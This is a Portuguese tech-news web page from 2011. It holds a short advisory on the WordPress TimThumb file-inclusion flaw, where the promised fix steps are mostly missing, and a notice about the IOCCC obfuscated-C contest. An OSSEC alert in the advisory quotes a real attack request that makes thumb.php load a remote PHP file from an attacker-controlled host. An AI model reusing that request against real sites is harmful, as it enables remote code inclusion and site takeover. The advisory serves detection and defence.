De acordo com as Leis 12.965/2014 e 13.709/2018, que regulam o uso da Internet e o tratamento de dados pessoais no Brasil, ao me inscrever na newsletter do portal DICAS-L, autorizo o envio de notificações por e-mail ou outros meios e declaro estar ciente e concordar com seus Termos de Uso e Política de Privacidade.
Colaboração: Alexandro Silva
Data de Publicação: 18 de novembro de 2011
Surgiu uma vulnerabilidade no Wordpress classificada como alta. A falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.
O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.
OSSEC HIDS Notification. 2011 Nov 11 03:29:38 Received From: acme->/var/log/httpd/www.acme.com-access_log Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip." Portion of the log(s): xx.xxx.xxx.xxx - - [11/Nov/2011:04:29:25 -0200] "GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
Para corrigi-la é necessário executar os seguintes passos:
timthumb.php, thumb.php ou similar encontra-se no diretório template localizado em wp-content/themes;
Notícia publicada originalmente no blog do autor
markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/
Fonte: Notícias Linux
O "International Obfuscated C Code Contest" (IOCCC), Competição Internacional de Código C Ofuscado, retornou e anunciou o início da vigésima competição; a competição estava em hiato, sem resultados publicados para a última competição, que foi realizada em 2006. Agora a competição está de volta e, de 12 de novembro de 2011 até 12 de janeiro de 2012, as inscrições estão abertas para a competição de escrever o mais obscuro ou ofuscado programa em linguagem C que irá ilustrar, perversamente, a importância do estilo de programação, estressar compiladores C com relação a código estranho e demonstrar as sutilezas da linguagem C. Apesar da competição já estar aberta, as submissões online serão aceitas somente a partir de 1o. de dezembro, já que o sistema de submissão está sendo atualizado.
This policy contains information about your privacy. By posting, you are declaring that you understand this policy:
This policy is subject to change at any time and without notice.
These terms and conditions contain rules about posting comments. By submitting a comment, you are declaring that you agree with these rules:
Failure to comply with these rules may result in being banned from submitting further comments.
These terms and conditions are subject to change at any time and without notice.
Comentários